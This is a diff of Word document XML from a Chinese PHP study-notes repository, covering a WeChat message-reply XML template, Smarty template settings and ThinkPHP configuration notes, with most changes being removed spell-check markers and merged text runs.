+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>&gt;&lt;![CDATA[%s]]&gt;&lt;/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>ToUserName</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>FromUserName</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>&gt;&lt;![CDATA[%s]]&gt;&lt;/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>FromUserName</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>CreateTime</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>&gt;%s&lt;/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>CreateTime</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>MsgType</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>&gt;&lt;![CDATA[%s]]&gt;&lt;/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>MsgType</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;Content&gt;&lt;![CDATA[%s]]&gt;&lt;/Content&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;/xml&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>$</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>postObj</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>=</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="BC5A65"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>simplexml_load_string</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>$</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>postXml</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>//xml</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>转换为对象</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>将</w:t>
+            </w:r>
+            <w:r>
+              <w:t>xml</w:t>
+            </w:r>
+            <w:r>
+              <w:t>转换为对象后就可以直接设置和获取</w:t>
+            </w:r>
+            <w:r>
+              <w:t>xml</w:t>
+            </w:r>
+            <w:r>
+              <w:t>中项的值</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6439" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>纯文本消息回复：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="2" w:name="_GoBack"/>
+            <w:bookmarkEnd w:id="2"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6440" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6440" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
     <w:p/>
     <w:p/>
     <w:p/>

--- a/编程技能汇总/PHP/PHP进阶_框架.docx
+++ b/编程技能汇总/PHP/PHP进阶_框架.docx
@@ -290,7 +290,6 @@
               </w:rPr>
               <w:t>$smarty-&gt;</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
@@ -299,7 +298,6 @@
               </w:rPr>
               <w:t>left_delimiter</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
@@ -360,7 +358,6 @@
               </w:rPr>
               <w:t>$smarty-&gt;</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
@@ -369,7 +366,6 @@
               </w:rPr>
               <w:t>right_delimiter</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
@@ -444,25 +440,7 @@
                 <w:color w:val="000000"/>
                 <w:kern w:val="0"/>
               </w:rPr>
-              <w:t>$smarty-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="000000"/>
-                <w:kern w:val="0"/>
-              </w:rPr>
-              <w:t>setTemplateDir</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="000000"/>
-                <w:kern w:val="0"/>
-              </w:rPr>
-              <w:t>(</w:t>
+              <w:t>$smarty-&gt;setTemplateDir(</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -470,25 +448,7 @@
                 <w:color w:val="0000C0"/>
                 <w:kern w:val="0"/>
               </w:rPr>
-              <w:t>"</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="0000C0"/>
-                <w:kern w:val="0"/>
-              </w:rPr>
-              <w:t>tpl</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="0000C0"/>
-                <w:kern w:val="0"/>
-              </w:rPr>
-              <w:t>"</w:t>
+              <w:t>"tpl"</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -532,25 +492,7 @@
                 <w:color w:val="000000"/>
                 <w:kern w:val="0"/>
               </w:rPr>
-              <w:t>$smarty-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="000000"/>
-                <w:kern w:val="0"/>
-              </w:rPr>
-              <w:t>setCompileDir</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="000000"/>
-                <w:kern w:val="0"/>
-              </w:rPr>
-              <w:t>(</w:t>
+              <w:t>$smarty-&gt;setCompileDir(</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -558,25 +500,7 @@
                 <w:color w:val="0000C0"/>
                 <w:kern w:val="0"/>
               </w:rPr>
-              <w:t>"</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="0000C0"/>
-                <w:kern w:val="0"/>
-              </w:rPr>
-              <w:t>templates_c</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="0000C0"/>
-                <w:kern w:val="0"/>
-              </w:rPr>
-              <w:t>"</w:t>
+              <w:t>"templates_c"</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -620,25 +544,7 @@
                 <w:color w:val="000000"/>
                 <w:kern w:val="0"/>
               </w:rPr>
-              <w:t>$smarty-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="000000"/>
-                <w:kern w:val="0"/>
-              </w:rPr>
-              <w:t>setCacheDir</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="000000"/>
-                <w:kern w:val="0"/>
-              </w:rPr>
-              <w:t>(</w:t>
+              <w:t>$smarty-&gt;setCacheDir(</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -749,25 +655,7 @@
                 <w:color w:val="557F5F"/>
                 <w:kern w:val="0"/>
               </w:rPr>
-              <w:t>// $smarty-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="557F5F"/>
-                <w:kern w:val="0"/>
-              </w:rPr>
-              <w:t>cache_lifetime</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="557F5F"/>
-                <w:kern w:val="0"/>
-              </w:rPr>
-              <w:t>=120;//</w:t>
+              <w:t>// $smarty-&gt;cache_lifetime=120;//</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -907,25 +795,7 @@
                 <w:color w:val="0000C0"/>
                 <w:kern w:val="0"/>
               </w:rPr>
-              <w:t>"</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="0000C0"/>
-                <w:kern w:val="0"/>
-              </w:rPr>
-              <w:t>test.tpl</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="0000C0"/>
-                <w:kern w:val="0"/>
-              </w:rPr>
-              <w:t>"</w:t>
+              <w:t>"test.tpl"</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1247,7 +1117,6 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -1261,7 +1130,6 @@
               </w:rPr>
               <w:t>oreach</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -1888,11 +1756,9 @@
         </w:rPr>
         <w:t>，</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>ThinkPHP</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>框架</w:t>
       </w:r>
@@ -1927,11 +1793,9 @@
       <w:r>
         <w:t>的</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>ThinkPHP</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>参考手册请点击以下链接</w:t>
       </w:r>
@@ -2052,14 +1916,12 @@
             <w:tcW w:w="6441" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>ThinkPHP</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -2150,7 +2012,6 @@
             <w:r>
               <w:t>目录下创建</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -2160,7 +2021,6 @@
             <w:r>
               <w:t>.php</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -2170,19 +2030,11 @@
             <w:r>
               <w:t>定义模块的基本信息，执行</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>php</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t xml:space="preserve"> console build</w:t>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>php console build</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2246,11 +2098,9 @@
             <w:r>
               <w:t>开启</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>pathinfo</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:r>
@@ -2503,11 +2353,9 @@
             <w:r>
               <w:t>传统的</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>url</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t>文件路径方式访问</w:t>
             </w:r>
@@ -2557,13 +2405,8 @@
               <w:t>application</w:t>
             </w:r>
             <w:r>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>config.php</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>/config.php</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -2610,72 +2453,40 @@
                 <w:color w:val="0070C0"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>'</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
+              <w:t>'url_controller_convert'    =&gt;  false,</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:color w:val="0070C0"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>url_controller_convert</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>'    =&gt;  false,</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
+              <w:t xml:space="preserve">// </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
+              <w:t>关闭操作名的自动转换</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
                 <w:color w:val="0070C0"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">// </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>关闭操作名的自动转换</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>'</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>url_action_convert</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>'        =&gt;  false,</w:t>
+              <w:t>'url_action_convert'        =&gt;  false,</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2989,28 +2800,12 @@
             <w:r>
               <w:t>可以使用的配置项在</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>thinkphp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>convention.php</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>thinkphp/convention.php</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -3020,11 +2815,9 @@
             <w:r>
               <w:t>中，并且已经有默认配置，可以选择需要的配置项放入</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>config.php</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -3245,80 +3038,22 @@
               </w:rPr>
               <w:t xml:space="preserve">     </w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>Config</w:t>
-            </w:r>
